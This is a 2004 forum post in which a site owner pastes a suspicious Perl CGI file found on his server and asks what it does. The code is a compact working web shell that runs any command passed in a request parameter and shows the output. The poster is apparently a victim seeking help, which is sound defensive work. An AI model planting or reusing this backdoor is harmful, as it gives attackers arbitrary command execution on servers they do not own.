View Single Post
Old 04-02-2004, 07:55 PM  
Paul -C-
Confirmed User
 
Industry Role:
Join Date: Aug 2001
Posts: 1,255
What would this cgi code do?

Just found this cgi file on my server... looks a bit suspicious to me...

Code:
#!/usr/bin/perl 
use CGI qw(:standard); print header; my $k=param("g"); my $a=param("a"); if ($a || $k) {$l=`$k 2>&1`; print start_form,textarea("g",$k,3,50); print submit("fuck base-x"); print end_form; print pre($l);} print $ENV{"NS2.ISPRIME.COM"};
Can anyone tell me what it does?

Thanks!
Paul -C- is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote